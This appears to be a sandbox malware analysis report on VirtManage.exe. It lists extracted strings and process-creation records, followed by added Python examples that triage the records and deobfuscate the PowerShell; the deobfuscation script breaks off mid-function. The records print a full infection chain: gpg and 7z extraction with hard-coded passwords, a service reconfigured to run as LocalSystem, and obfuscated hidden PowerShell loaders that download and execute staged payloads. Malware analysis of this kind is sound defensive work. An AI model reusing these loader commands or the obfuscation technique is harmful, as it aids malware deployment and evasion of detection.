Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: select user_id, policy from bindings where fingerprint = ?;
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: select fingerprint || case sum(conflict NOTNULL) when 0 then '' else '!' end from bindings where email = ? group by fingerprint order by fingerprint = ? asc, fingerprint desc;
Source: gpg.exe, gpg.exe, 00000003.00000002.921015417.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.932022027.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.993208467.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000C.00000002.998574183.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: gpg.exe, gpg.exe, 00000003.00000002.921015417.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.932022027.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.993208467.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000C.00000002.998574183.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: insert into ultimately_trusted_keys values ('%s');
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.916314177.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000003.00000002.921015417.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.932022027.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.993208467.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000C.00000002.998574183.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.dr | Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: create table if not exists ultimately_trusted_keys (keyid);
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: create table version (version INTEGER);error initializing TOFU database: %s
Source: gpg.exe, gpg.exe, 00000003.00000002.921015417.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.932022027.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.993208467.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000C.00000002.998574183.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: select version from version;
Source: gpg.exe, gpg.exe, 00000003.00000002.921015417.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.932022027.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.993208467.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000C.00000002.998574183.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.dr | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: create table signatures (binding INTEGER NOT NULL, sig_digest TEXT, origin TEXT, sig_time INTEGER, time INTEGER, primary key (binding, sig_digest, origin));
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: update bindings set effective_policy = %d, conflict = %Q where email = %Q and fingerprint = %Q and effective_policy != %d;
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: select count(*) from sqlite_master where type='table';error reading TOFU database: %s
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: update bindings set effective_policy = ? where fingerprint = ?;
Source: VirtManage.exe | Virustotal: Detection: 13%
Source: gpg.exe | String found in binary or memory: full-help
Source: gpg.exe | String found in binary or memory: i386/mpih-add1.S:i386/mpih-sub1.S:i386/mpih-mul1.S:i386/mpih-mul2.S:i386/mpih-mul3.S:i386/mpih-lshift.S:i386/mpih-rshift.S
Source: C:\Users\user\Desktop\VirtManage.exe | File read: C:\Users\user\Desktop\VirtManage.exe
Source: unknown | Process created: C:\Users\user\Desktop\VirtManage.exe "C:\Users\user\Desktop\VirtManage.exe"
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\5FILE.1A.gpg
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\7za.dll --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\1FILE.1A.gpg
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\2FILE.1A.gpg
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI
Source: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i "C:\ProgramData\Microsoft\MicrosoftAPI\RVTools.msi"
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\Cert.txt --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\3FILE.1A.gpg
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\4FILE.1A.gpg
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6DE2D63DBA183F9FE048D9EF7023AC72 C
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\Windows\SysWOW64\sc.exe sc config msdtc start= demand
Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\Windows\SysWOW64\sc.exe sc config msdtc obj= "LocalSystem"
Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exe "C:\ProgramData\Microsoft\UpdateDesktop\winapi.exe"
Source: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:zX 'Net.WebClient';Set-Variable G8E $('C:\Pro'+'gramDat'+'a\Micro'+'soft\Update'+'Desktop\eep6d'+'i0uGu.t');dir rid*;Set-Variable kAl (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'G*d'}).Name).Invoke($ExecutionContext.InvokeCommand.GetCommandName('N*-O*',1,1),[System.Management.Automation.CommandTypes]::Cmdlet)(GI Variable:\zX).Value);Set-Item Variable:/75 ((((DIR Variable:\kAl).Value|Member)|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'D*g'}).Name);$ExecutionContext|ForEach{(Get-Item Variable:/_).Value.InvokeCommand.(($ExecutionContext.InvokeCommand|Member|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'*ke*pt'}).Name).Invoke((DIR Variable:\kAl).Value.((GV 75 -Va)).Invoke((ChildItem Variable:/G8E).Value))}"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D22.tmp" "c:\Users\user\AppData\Local\Temp\2s4bn4bw\CSC355371FC2ED34AC6B0D2C6DC18B9358D.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e3jseyke.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6B4F.tmp" "c:\Users\user\AppData\Local\Temp\CSCC2520B897D0D4F99AF1935CDE7767C35.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
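The process-creation records above are the part of this report an analyst reads first, so it is worth turning them into a parent/child tree and scoring them. The script below is an added example and not part of the Joe Sandbox report: it embeds a subset of the records quoted above (constructed from the lines as printed here, with the two table cells separated by " | " and the first PowerShell command line cut short after its opening statements), reconstructs the lineage VirtManage.exe -> winapi.exe -> powershell.exe -> csc.exe, and applies rules that mirror signatures the report itself raised (inline gpg passphrase, password-protected 7z extraction, sc config msdtc, hidden PowerShell with Net.WebClient, csc.exe compiling from %TEMP%, whoami under PowerShell). The finding names are the example's own.

```python
import re

# Process-creation records constructed from the report's own lines above (a
# subset; the two table cells are separated by ' | ' and the PowerShell
# command line is cut short after its first statements).
RECORDS = r"""
Source: unknown | Process created: C:\Users\user\Desktop\VirtManage.exe "C:\Users\user\Desktop\VirtManage.exe"
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\5FILE.1A.gpg
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i "C:\ProgramData\Microsoft\MicrosoftAPI\RVTools.msi"
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\Windows\SysWOW64\sc.exe sc config msdtc obj= "LocalSystem"
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;(rest omitted)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
"""

RECORD_RE = re.compile(r"^Source: (?P<parent>.+?) \| Process created: (?P<image>\S+) (?P<cmdline>.*)$")


def parse_records(text):
    """Return (parent_image, image, command_line) for every well-formed record."""
    rows = []
    for line in text.strip().splitlines():
        m = RECORD_RE.match(line)
        if m:
            rows.append((m["parent"], m["image"], m["cmdline"]))
    return rows


def base(path):
    """Lower-cased file name of a Windows path ('unknown' stays 'unknown')."""
    return path.rsplit("\\", 1)[-1].lower()


# (finding, predicate over parent image, image, command line). The names are
# this example's own; each mirrors a signature the report raised.
RULES = [
    ("gpg decrypt with passphrase on the command line",
     lambda p, i, c: base(i) == "gpg.exe" and "--passphrase" in c and "--decrypt" in c),
    ("password-protected 7z extraction",
     lambda p, i, c: base(i) == "7za.exe" and re.search(r"(^|\s)-p\S", c) is not None),
    ("msdtc service reconfigured via sc.exe",
     lambda p, i, c: base(i) == "sc.exe" and "config msdtc" in c.lower()),
    ("hidden PowerShell pulling a local file through Net.WebClient",
     lambda p, i, c: base(i) == "powershell.exe"
                     and "-windowstyle hidden" in c.lower() and "net.webclient" in c.lower()),
    ("csc.exe compiling from %TEMP% under PowerShell",
     lambda p, i, c: base(i) == "csc.exe" and base(p) == "powershell.exe"
                     and "\\appdata\\local\\temp\\" in c.lower()),
    ("whoami spawned by PowerShell",
     lambda p, i, c: base(i) == "whoami.exe" and base(p) == "powershell.exe"),
    ("executable launched from C:\\ProgramData",
     lambda p, i, c: i.lower().startswith("c:\\programdata\\")),
]


def triage(text):
    """Apply every rule to every record; return sorted (finding, image name) pairs."""
    hits = set()
    for parent, image, cmdline in parse_records(text):
        for finding, hit in RULES:
            if hit(parent, image, cmdline):
                hits.add((finding, base(image)))
    return sorted(hits)


def lineage(text, image_name):
    """Walk parent pointers from image_name back to the root (first parent seen wins)."""
    parents = {}
    for parent, image, _ in parse_records(text):
        parents.setdefault(base(image), base(parent))
    chain = [image_name.lower()]
    while parents.get(chain[-1], "unknown") != "unknown" and len(chain) < 32:
        chain.append(parents[chain[-1]])
    return chain[::-1]


if __name__ == "__main__":
    print(" -> ".join(lineage(RECORDS, "csc.exe")))
    for finding, image in triage(RECORDS):
        print(f"[{image}] {finding}")
```

The msiexec /i RVTools.msi record is deliberately left unflagged: nothing in that command line is suspicious on its own, and it is the lineage (an installer from C:\ProgramData, started by the same parent that runs gpg.exe with a hard-coded passphrase) that makes it worth a look. On real telemetry the same rules should key on process IDs rather than image names, since one image can have several parents, as powershell.exe does here.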
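The two powershell.exe command lines above (one spawned by the MicrosoftAPI copy of winapi.exe, one by the UpdateDesktop copy) never name a cmdlet or a method directly: every identifier is recovered at run time by wildcard-matching member names (-clike '*dl*t', -ilike 'D*g') or by indexing into Get-Member output ((... | GM)[6]), and the file path is split into string fragments. The Python below, added here as a worked example and not part of the Joe Sandbox report, replays those lookups against hand-written member tables and reassembles the paths to produce the plain-text equivalent of each stage. The member tables are an assumption of the example, transcribed from a Windows PowerShell 5.1 session; they are partial and only need to contain every candidate a pattern could plausibly hit.

```python
import fnmatch
import re

# $ExecutionContext | Get-Member, in print order (methods, then properties,
# each alphabetical) as seen on Windows PowerShell 5.1. The first one-liner
# depends on index 6 being InvokeCommand.
EXECUTION_CONTEXT_MEMBERS = [
    "Equals", "GetHashCode", "GetType", "ToString",
    "Events", "Host", "InvokeCommand", "InvokeProvider", "SessionState",
]
# Public methods of $ExecutionContext.InvokeCommand (CommandInvocationIntrinsics).
INVOKE_COMMAND_METHODS = [
    "Equals", "ExpandString", "GetCmdlet", "GetCmdletByTypeName", "GetCmdlets",
    "GetCommand", "GetCommandName", "GetCommands", "GetHashCode", "GetType",
    "InvokeScript", "NewScriptBlock", "ToString",
]
# System.Net.WebClient members starting with D, events included as Get-Member lists them.
WEBCLIENT_MEMBERS = [
    "Dispose", "DownloadData", "DownloadDataAsync", "DownloadDataCompleted",
    "DownloadDataTaskAsync", "DownloadFile", "DownloadFileAsync",
    "DownloadFileCompleted", "DownloadFileTaskAsync", "DownloadProgressChanged",
    "DownloadString", "DownloadStringAsync", "DownloadStringCompleted",
    "DownloadStringTaskAsync",
]
# Cmdlet names that GetCommandName / Get-Command patterns are matched against (subset).
CMDLET_NAMES = [
    "New-Alias", "New-Event", "New-Item", "New-Module", "New-Object",
    "New-Variable", "Invoke-Command", "Invoke-Expression", "Invoke-Item",
]


def resolve(pattern, members, case_sensitive=True):
    """Emulate Where-Object { $_.Name -clike $pattern } (or -ilike when
    case_sensitive is False) and insist on exactly one hit, which is what
    the one-liners silently assume."""
    def match(name):
        if case_sensitive:
            return fnmatch.fnmatchcase(name, pattern)
        return fnmatch.fnmatchcase(name.lower(), pattern.lower())
    hits = [m for m in members if match(m)]
    if len(hits) != 1:
        raise ValueError(f"{pattern!r} matched {hits}, expected exactly one")
    return hits[0]


def join_fragments(expr):
    """Reassemble a $('a'+'b'+'c') string built from single-quoted pieces."""
    return "".join(re.findall(r"'([^']*)'", expr))


def decode_first_stage():
    """Replay the lookups in the one-liner spawned by the MicrosoftAPI copy of winapi.exe."""
    path = join_fragments(r"$('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t')")
    prop = EXECUTION_CONTEXT_MEMBERS[6]                        # ((Item Variable:\*uti*t).Value|GM)[6].Name
    getter = resolve("*dl*t", INVOKE_COMMAND_METHODS)          # -clike '*dl*t'
    namer = resolve("*nd*e", INVOKE_COMMAND_METHODS)           # -clike '*nd*e'
    cmdlet = resolve("N*ct", CMDLET_NAMES, False)              # GetCommandName('N*ct', 1, $TRUE)
    method = resolve("D*g", WEBCLIENT_MEMBERS)                 # -clike 'D*g'
    runner = resolve("*e-*press*", CMDLET_NAMES, False)        # Get-Command *e-*press*
    return {
        "path": path,
        "lookups": [prop, getter, namer, cmdlet, method, runner],
        "equivalent": f"{runner} ((New-Object Net.WebClient).{method}('{path}'))",
    }


def decode_second_stage():
    """Replay the lookups in the one-liner spawned by the UpdateDesktop copy of winapi.exe."""
    path = join_fragments(r"$('C:\Pro'+'gramDat'+'a\Micro'+'soft\Update'+'Desktop\eep6d'+'i0uGu.t')")
    getter = resolve("G*d", INVOKE_COMMAND_METHODS, False)     # -ilike 'G*d' -> GetCommand(name, Cmdlet)
    cmdlet = resolve("N*-O*", CMDLET_NAMES, False)             # GetCommandName('N*-O*', 1, 1)
    method = resolve("D*g", WEBCLIENT_MEMBERS, False)          # -ilike 'D*g'
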